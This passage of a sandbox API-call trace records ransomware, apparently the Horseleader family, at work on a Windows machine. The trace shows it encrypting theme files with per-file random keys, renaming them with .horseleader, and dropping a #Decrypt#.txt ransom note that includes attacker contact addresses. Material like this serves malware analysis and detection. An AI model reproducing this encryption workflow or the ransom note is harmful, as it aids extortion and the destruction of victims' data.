ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6003c730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1c2, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BREEZE.INF", cAlternateFileName="")) returned 1 [0246.283] lstrcmpiW (lpString1="BREEZE.INF", lpString2="Windows") returned -1 [0246.283] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF") returned 77 [0246.283] StrStrIW (lpFirst="BREEZE.INF", lpSrch=".horseleader") returned 0x0 [0246.283] lstrcmpW (lpString1="BREEZE.INF", lpString2="#Decrypt#.txt") returned 1 [0246.283] lstrcmpW (lpString1="BREEZE.INF", lpString2="_uninstalling_.png") returned 1 [0246.284] lstrlenW (lpString=".testttjffg") returned 11 [0246.284] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF", lpSrch=".testttjffg") returned 0x0 [0246.284] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.284] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.285] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF") returned 77 [0246.286] StrStrW (lpFirst="BREEZE.INF", lpSrch=".txt") returned 0x0 [0246.286] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=450) returned 1 [0246.286] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1c2, lpOverlapped=0x0) returned 1 [0246.287] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.287] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1c2, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1c2, lpOverlapped=0x0) returned 1 [0246.287] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.288] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.288] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.288] CloseHandle (hObject=0x1a4) returned 1 [0246.288] GetProcessHeap () returned 0x780000 [0246.288] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.288] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF.horseleader") returned 89 [0246.288] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.inf.horseleader")) returned 1 [0246.291] GetProcessHeap () returned 0x780000 [0246.291] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.291] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xaa2, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.291] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.292] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 78 [0246.292] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.292] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.292] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.292] lstrlenW (lpString=".testttjffg") returned 11 [0246.292] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.292] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.292] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.295] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 78 [0246.295] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.295] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2722) returned 1 [0246.295] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xaa2, lpOverlapped=0x0) returned 1 [0246.298] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff55e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.298] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xaa2, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xaa2, lpOverlapped=0x0) returned 1 [0246.298] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.298] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.298] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.299] CloseHandle (hObject=0x1a4) returned 1 [0246.299] GetProcessHeap () returned 0x780000 [0246.299] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.299] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.horseleader") returned 90 [0246.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.horseleader")) returned 1 [0246.300] GetProcessHeap () returned 0x780000 [0246.300] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.300] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xa90c, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.300] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.300] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 79 [0246.300] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.300] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.300] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.301] lstrlenW (lpString=".testttjffg") returned 11 [0246.301] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.301] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.301] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.301] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.305] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 79 [0246.305] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.305] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=43276) returned 1 [0246.306] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.308] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.308] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.309] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.312] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.312] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.312] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x90c, lpOverlapped=0x0) returned 1 [0246.312] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff6f4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.312] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x90c, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x90c, lpOverlapped=0x0) returned 1 [0246.313] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.313] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.313] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.313] CloseHandle (hObject=0x1a4) returned 1 [0246.314] GetProcessHeap () returned 0x780000 [0246.314] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.314] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.horseleader") returned 91 [0246.314] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.horseleader")) returned 1 [0246.315] GetProcessHeap () returned 0x780000 [0246.315] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.315] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xa90c, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.315] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.315] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\#Decrypt#.txt") returned 80 [0246.315] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.316] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.316] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.317] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.318] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.318] CloseHandle (hObject=0x158) returned 1 [0246.318] GetProcessHeap () returned 0x780000 [0246.318] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.318] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CANYON", cAlternateFileName="")) returned 1 [0246.318] lstrcmpiW (lpString1="CANYON", lpString2="Windows") returned -1 [0246.318] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON") returned 66 [0246.318] lstrcmpW (lpString1="CANYON", lpString2=".") returned 1 [0246.318] lstrcmpW (lpString1="CANYON", lpString2="..") returned 1 [0246.319] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.319] GetProcessHeap () returned 0x780000 [0246.319] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.319] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*") returned 68 [0246.319] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.320] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.320] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\.") returned 68 [0246.321] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.321] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.321] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.321] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\..") returned 69 [0246.321] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.321] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.321] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb876200, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51c2ab50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeb876200, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xaec9, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CANYON.ELM", cAlternateFileName="")) returned 1 [0246.321] lstrcmpiW (lpString1="CANYON.ELM", lpString2="Windows") returned -1 [0246.321] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 77 [0246.321] StrStrIW (lpFirst="CANYON.ELM", lpSrch=".horseleader") returned 0x0 [0246.321] lstrcmpW (lpString1="CANYON.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.321] lstrcmpW (lpString1="CANYON.ELM", lpString2="_uninstalling_.png") returned 1 [0246.321] lstrlenW (lpString=".testttjffg") returned 11 [0246.322] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM", lpSrch=".testttjffg") returned 0x0 [0246.322] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.322] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 